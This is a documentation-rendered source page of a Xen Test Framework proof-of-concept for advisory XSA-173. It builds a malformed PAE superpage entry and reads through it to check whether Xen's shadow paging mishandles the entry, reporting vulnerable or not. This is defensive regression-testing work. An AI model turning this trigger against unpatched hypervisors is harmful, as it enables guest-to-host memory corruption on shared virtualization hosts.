Xen Test Framework
tests
xsa-173
main.c
Go to the documentation of this file.
1
23
#include <xtf.h>
24
25
const
char
test_title
[] =
"XSA-173 PoC"
;
26
27
/* New L2 pagetable for the test to manipulate. */
28
static
uint64_t
nl2
[
PAE_L2_PT_ENTRIES
]
__page_aligned_bss
;
29
30
void
test_main
(
void
)
31
{
32
uint64_t
*ptr, val;
33
exinfo_t
fault = 0;
34
35
/* Hook nl2 into the existing l3, just above the 4GB boundary. */
36
pae_l3_identmap[4] =
pte_from_virt
(
nl2
,
PF_SYM
(U, RW, P));
37
38
/*
39
* Create an invalid super-l2e. Needs to map a GFN large than 2^44 to
40
* trigger the trunction in Xen, and have reserved bits set to help
41
* distinguish buggy shadow from non-buggy shadow or hap.
42
*/
43
nl2
[0] =
pte_from_gfn
(((1ULL << 34) - 1),
PF_SYM
(PSE, U, RW, P));
44
45
/* Create a pointer which uses the bad l2e. */
46
ptr =
_p
((4ULL <<
PAE_L3_PT_SHIFT
) +
MB
(1));
47
48
asm
volatile
(
"1:mov %[ptr], %[val]; 2:"
49
_ASM_EXTABLE_HANDLER
(1b, 2b, %P[rec])
50
: [val]
"=r"
(val),
"+a"
(fault)
51
: [ptr]
"m"
(*ptr), [rec]
"p"
(
ex_record_fault_eax
));
52
53
switch
( fault )
54
{
55
case
EXINFO_SYM
(PF,
PFEC_SYM
(R, P)):
56
/* #PF[Rsvd] => Page wasn't shadowed. */
57
return
xtf_success
(
"Xen appears not vulnerable\n"
);
58
59
case
0:
60
printk
(
"Value at %p is 0x%08"
PRIx64
"\n"
, ptr, val);
61
return
xtf_failure
(
"Xen shadowed bogus sl2e\n"
);
62
63
default
:
64
return
xtf_error
(
"Unexpected fault %#x, %pe\n"
, fault,
_p
(fault));
65
}
66
}
67
68
/*
69
* Local variables:
70
* mode: C
71
* c-file-style: "BSD"
72
* c-basic-offset: 4
73
* tab-width: 4
74
* indent-tabs-mode: nil
75
* End:
76
*/
ex_record_fault_eax
bool ex_record_fault_eax(struct cpu_regs *regs, const struct extable_entry *ex)
Record the current fault in %eax.
Definition:
extable.c:8
__page_aligned_bss
#define __page_aligned_bss
Definition:
compiler.h:37
printk
void printk(const char *fmt,...)
Definition:
console.c:134
test_main
void test_main(void)
To be implemented by each test, as its entry point.
Definition:
main.c:110
test_title
const char test_title[]
The title of the test.
Definition:
main.c:24
EXINFO_SYM
#define EXINFO_SYM(exc, ec)
Definition:
exinfo.h:29
exinfo_t
unsigned int exinfo_t
Packed exception and error code information.
Definition:
exinfo.h:19
_ASM_EXTABLE_HANDLER
#define _ASM_EXTABLE_HANDLER(fault, fixup, handler)
Create an exception table entry with custom handler.
Definition:
extable.h:38
PRIx64
#define PRIx64
Definition:
inttypes.h:23
_p
#define _p(v)
Express an abitrary integer v as void *.
Definition:
numbers.h:48
MB
#define MB(num)
Express num in Megabytes.
Definition:
numbers.h:26
PAE_L3_PT_SHIFT
#define PAE_L3_PT_SHIFT
Definition:
page-pae.h:34
PAE_L2_PT_ENTRIES
#define PAE_L2_PT_ENTRIES
Definition:
page-pae.h:24
pte_from_gfn
intpte_t pte_from_gfn(unsigned long gfn, uint64_t flags)
pte_from_virt
intpte_t pte_from_virt(const void *va, uint64_t flags)
xtf_failure
void xtf_failure(const char *fmt,...)
Report a test failure.
Definition:
report.c:94
xtf_error
void xtf_error(const char *fmt,...)
Report a test error.
Definition:
report.c:80
xtf_success
void xtf_success(const char *fmt,...)
Report test success.
Definition:
report.c:38
uint64_t
__UINT64_TYPE__ uint64_t
Definition:
stdint.h:17
PFEC_SYM
#define PFEC_SYM(...)
Create pagetable error code based on mnemonics.
Definition:
symbolic-const.h:119
PF_SYM
#define PF_SYM(...)
Create pagetable entry flags based on mnemonics.
Definition:
symbolic-const.h:108
nl2
static uint64_t nl2[PAE_L2_PT_ENTRIES]
Definition:
main.c:28
Generated by
1.9.4
